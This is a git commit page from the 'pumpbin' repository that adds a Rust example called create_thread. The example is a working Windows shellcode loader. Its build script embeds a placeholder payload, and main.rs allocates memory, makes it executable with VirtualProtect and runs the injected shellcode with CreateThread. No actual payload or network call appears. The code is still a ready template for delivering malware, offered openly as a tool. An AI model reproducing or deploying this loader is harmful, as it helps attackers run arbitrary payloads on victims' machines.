Ark/pumpbin
1
0
Fork 0
mirror of https://github.com/pumpbin/pumpbin synced 2026-03-14 23:04:30 -07:00
Code Issues Packages Projects Releases Wiki Activity

example: add create_thread

Browse Source
This commit is contained in:
b1n
2024-06-23 20:44:29 +08:00
parent b20db624c0
commit 442f4fac8c
4 changed files with 136 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

76
examples/create_thread/Cargo.lock generated Normal file
View File

@@ -0,0 +1,76 @@
# This file is automatically @generated by Cargo.
# It is not intended for manual editing.
version = 3
[[package]]
name = "create_thread"
version = "0.1.0"
dependencies = [
"windows-sys",
]
[[package]]
name = "windows-sys"
version = "0.48.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9"
dependencies = [
"windows-targets",
]
[[package]]
name = "windows-targets"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c"
dependencies = [
"windows_aarch64_gnullvm",
"windows_aarch64_msvc",
"windows_i686_gnu",
"windows_i686_msvc",
"windows_x86_64_gnu",
"windows_x86_64_gnullvm",
"windows_x86_64_msvc",
]
[[package]]
name = "windows_aarch64_gnullvm"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8"
[[package]]
name = "windows_aarch64_msvc"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc"
[[package]]
name = "windows_i686_gnu"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e"
[[package]]
name = "windows_i686_msvc"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406"
[[package]]
name = "windows_x86_64_gnu"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e"
[[package]]
name = "windows_x86_64_gnullvm"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc"
[[package]]
name = "windows_x86_64_msvc"
version = "0.48.5"
source = "registry+https://github.com/rust-lang/crates.io-index"
checksum = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538"

9
examples/create_thread/Cargo.toml Normal file
View File

@@ -0,0 +1,9 @@
[package]
name = "create_thread"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
windows-sys = { version = "0.48.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_Security"] }

7
examples/create_thread/build.rs Normal file
View File

@@ -0,0 +1,7 @@
use std::{fs, iter};
fn main() {
let mut shellcode = "$$SHELLCODE$$".as_bytes().to_vec();
shellcode.extend(iter::repeat(b'0').take(1024*1024));
fs::write("shellcode", shellcode.as_slice()).unwrap();
}

44
examples/create_thread/src/main.rs Normal file
View File

@@ -0,0 +1,44 @@
use std::mem::transmute;
use std::ptr::{copy, null, null_mut};
use windows_sys::Win32::Foundation::{GetLastError, FALSE, WAIT_FAILED};
use windows_sys::Win32::System::Memory::{
VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,
};
use windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};
#[cfg(target_os = "windows")]
fn main() {
let shellcode = include_bytes!("../shellcode");
const SIZE_HOLDER: &str = "$$99999$$";
let shellcode_len = usize::from_str_radix(SIZE_HOLDER, 10).unwrap();
let shellcode = &shellcode[0..shellcode_len];
let shellcode_size = shellcode.len();
unsafe {
let addr = VirtualAlloc(
null(),
shellcode_size,
MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE,
);
if addr.is_null() {
panic!("[-]VirtualAlloc failed: {}!", GetLastError());
}
copy(shellcode.as_ptr(), addr.cast(), shellcode_size);
let mut old = PAGE_READWRITE;
let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);
if res == FALSE {
panic!("[-]VirtualProtect failed: {}!", GetLastError());
}
let addr = transmute(addr);
let thread = CreateThread(null(), 0, addr, null(), 0, null_mut());
if thread == 0 {
panic!("[-]CreateThread failed: {}!", GetLastError());
}
WaitForSingleObject(thread, WAIT_FAILED);
}
}